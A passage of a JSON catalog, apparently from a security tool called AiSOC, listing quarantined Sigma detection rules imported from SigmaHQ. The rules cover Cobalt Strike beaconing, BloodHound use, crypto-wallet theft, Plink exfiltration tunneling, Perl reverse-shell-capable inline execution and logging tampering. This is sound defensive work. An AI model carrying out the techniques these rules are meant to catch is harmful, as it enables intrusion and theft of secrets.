"f26307d8-14cd-47e3-a26b-4b4769f24af6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml" } }, { "id": "sigmahq-sigma-f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "type": "detection", "name": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-base64-encoded-powershell-keywords-in-command-lines.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_hidden_flag.yml" } }, { "id": "sigmahq-sigma-f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "type": "detection", "name": "Suspicious Electron Application Child Processes", "description": "Detects suspicious child processes of electron apps (teams, discord, slack, etc.). 
This could be a potential sign of \".asar\" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-electron-application-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" } }, { "id": "sigmahq-sigma-f272fb46-25f2-422c-b667-45837994980f", "type": "detection", "name": "Authentications To Important Apps Using Single Factor Authentication", "description": "Detect when authentications to important application(s) only required single-factor authentication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/authentications-to-important-apps-using-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f272fb46-25f2-422c-b667-45837994980f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" } }, { "id": "sigmahq-sigma-f2bed782-994e-4f40-9cd5-518198cb3fba", "type": "detection", "name": "Linux Sudo Chroot Execution", "description": "Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.\nAttackers may use this technique to evade detection and execute commands in a modified environment.\nThis can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.\nWhile investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-sudo-chroot-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f2bed782-994e-4f40-9cd5-518198cb3fba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_chroot_execution.yml" } }, { "id": "sigmahq-sigma-f2c64357-b1d2-41b7-849f-34d2682c0fad", "type": "detection", "name": "Suspicious Command Patterns In Scheduled Task Creation", "description": "Detects scheduled task creation using \"schtasks\" that contain potentially suspicious or uncommon commands", "version": "1.0.0", "author": "AiSOC", 
"tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-command-patterns-in-scheduled-task-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml" } }, { "id": "sigmahq-sigma-f305fd62-beca-47da-ad95-7690a0620084", "type": "detection", "name": "Potential Bucket Enumeration on AWS", "description": "Looks for potential enumeration of AWS buckets via ListBuckets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1580", "T1619" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-bucket-enumeration-on-aws.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f305fd62-beca-47da-ad95-7690a0620084", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_enum_buckets.yml" } }, { "id": "sigmahq-sigma-f318b911-ea88-43f4-9281-0de23ede628e", "type": "detection", "name": "PUA - CSExec Default Named Pipe", "description": "Detects default CSExec pipe creation", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-csexec-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f318b911-ea88-43f4-9281-0de23ede628e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml" } }, { "id": "sigmahq-sigma-f331aa1f-8c53-4fc3-b083-cc159bc971cb", "type": "detection", "name": "Malicious PowerShell Scripts - FileCreation", "description": "Detects the creation of known offensive powershell scripts used for exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-scripts-filecreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" } }, { "id": "sigmahq-sigma-f34047d9-20d3-4e8b-8672-0a35cc50dc71", "type": "detection", "name": "System Information Discovery - Auditd", 
"description": "Detects System Information Discovery commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-auditd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_system_info_discovery.yml" } }, { "id": "sigmahq-sigma-f346bbd5-2c4e-4789-a221-72de7685090d", "type": "detection", "name": "Google Cloud SQL Database Modified or Deleted", "description": "Detect when a Cloud SQL DB has been modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-sql-database-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f346bbd5-2c4e-4789-a221-72de7685090d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-f354eba5-623b-450f-b073-0b5b2773b6aa", "type": "detection", "name": "Potential DCOM 
InternetExplorer.Application DLL Hijack - Image Load", "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dcom-internetexplorer-application-dll-hijack-image-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml" } }, { "id": "sigmahq-sigma-f356a9c4-effd-4608-bbf8-408afd5cd006", "type": "detection", "name": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-cobalt-strike-dns-beaconing-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f356a9c4-effd-4608-bbf8-408afd5cd006", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-f35c5d71-b489-4e22-a115-f003df287317", "type": "detection", "name": "Potential CobaltStrike Process Patterns", "description": "Detects potential process patterns related to Cobalt Strike beacon activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-cobaltstrike-process-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f35c5d71-b489-4e22-a115-f003df287317", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml" } }, { "id": "sigmahq-sigma-f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "type": "detection", "name": "HackTool - Bloodhound/Sharphound Execution", "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.001", "T1087.002", "T1482", "T1069.001", "T1069.002", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-bloodhound-sharphound-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml" } }, { "id": "sigmahq-sigma-f37aba28-a9e6-4045-882c-d5004043b337", "type": "detection", "name": "Potential Arbitrary File Download Via Cmdl32.EXE", "description": "Detects execution of Cmdl32 with the \"/vpn\" and \"/lan\" flags.\nAttackers can abuse this utility in order to download arbitrary files via a configuration file.\nInspect the location and the content of the file passed as an argument in order to determine if it is suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-file-download-via-cmdl32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f37aba28-a9e6-4045-882c-d5004043b337", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmdl32_arbitrary_file_download.yml" } }, { "id": "sigmahq-sigma-f37b4bce-49d0-4087-9f5b-58bffda77316", "type": "detection", "name": "Potential AutoLogger Sessions Tampering", "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging.\nThe AutoLogger event tracing session records events up that occur early in the operating system boot process.\nApplications and device drivers can use the AutoLogger 
session to capture traces before the user logs in; the sessions are also used by security solutions as a telemetry source.\nAdversaries may disable these sessions to evade detection and prevent security monitoring of early boot activities and system events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-autologger-sessions-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" } }, { "id": "sigmahq-sigma-f38a82d2-fba3-4781-b549-525efbec8506", "type": "detection", "name": "PUA - 3Proxy Execution", "description": "Detects the use of 3proxy, a tiny free proxy server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-3proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f38a82d2-fba3-4781-b549-525efbec8506", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml" } }, { "id": "sigmahq-sigma-f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "type": "detection", "name": "Potential RDP Tunneling Via Plink", "description": "Execution of plink to perform data exfiltration and tunneling", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rdp-tunneling-via-plink.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_plink_susp_tunneling.yml" } }, { "id": "sigmahq-sigma-f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" } }, { "id": "sigmahq-sigma-f3d39c45-de1a-4486-a687-ab126124f744", "type": "detection", "name": "Sdiagnhost Calling Suspicious Child Process", "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sdiagnhost-calling-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f3d39c45-de1a-4486-a687-ab126124f744", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" } }, { "id": "sigmahq-sigma-f3f21ce1-cdef-4bfc-8328-ed2e826f5fac", "type": "detection", "name": "HackTool - CobaltStrike Malleable Profile Patterns - Proxy", "description": "Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-cobaltstrike-malleable-profile-patterns-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable 
by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f3f21ce1-cdef-4bfc-8328-ed2e826f5fac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml" } }, { "id": "sigmahq-sigma-f40017b3-cb2e-4335-ab5d-3babf679c1de", "type": "detection", "name": "Remote DLL Load Via Rundll32.EXE", "description": "Detects a remote DLL load event via \"rundll32.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-dll-load-via-rundll32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f40017b3-cb2e-4335-ab5d-3babf679c1de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_rundll32_remote_share_load.yml" } }, { "id": "sigmahq-sigma-f41b0311-44f9-44f0-816d-dd45e39d4bc8", "type": "detection", "name": "Access To Crypto Currency Wallets By Uncommon Applications", "description": "Detects file access requests to crypto currency files by uncommon processes.\nCould indicate potential attempt of crypto currency wallet stealing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/access-to-crypto-currency-wallets-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f41b0311-44f9-44f0-816d-dd45e39d4bc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_crypto_currency_wallets.yml" } }, { "id": "sigmahq-sigma-f41dada5-3f56-4232-8503-3fb7f9cf2d60", "type": "detection", "name": "ESXi Storage Information Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-storage-information-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f41dada5-3f56-4232-8503-3fb7f9cf2d60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml" } }, { "id": "sigmahq-sigma-f4264e47-f522-4c38-a420-04525d5b880f", "type": "detection", "name": "Renamed AutoIt Execution", "description": "Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe.\nAutoIt is a scripting 
language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks.\nAttackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-autoit-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4264e47-f522-4c38-a420-04525d5b880f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_autoit.yml" } }, { "id": "sigmahq-sigma-f426547a-e0f7-441a-b63e-854ac5bdf54d", "type": "detection", "name": "Perl Inline Command Execution", "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. 
This could be used to launch a reverse shell or to execute Perl code passed directly on the command line.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/perl-inline-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml" } }, { "id": "sigmahq-sigma-f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", "type": "detection", "name": "AWS Suspicious SAML Activity", "description": "Identifies when suspicious SAML activity has occurred in AWS. 
An adversary could gain backdoor access via SAML.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1548", "T1550", "T1550.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-suspicious-saml-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml" } }, { "id": "sigmahq-sigma-f44800ac-38ec-471f-936e-3fa7d9c53100", "type": "detection", "name": "PUA - CleanWipe Execution", "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-cleanwipe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f44800ac-38ec-471f-936e-3fa7d9c53100", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_cleanwipe.yml" } }, { "id": "sigmahq-sigma-f459ccb4-9805-41ea-b5b2-55e279e2424a", "type": "detection", "name": "Remote Access Tool - Team Viewer 
Session Started On MacOS Host", "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-team-viewer-session-started-on-macos-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f459ccb4-9805-41ea-b5b2-55e279e2424a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml" } }, { "id": "sigmahq-sigma-f4a623c2-4ef5-4c33-b811-0642f702c9f1", "type": "detection", "name": "Visual Studio Code Tunnel Shell Execution", "description": "Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. 
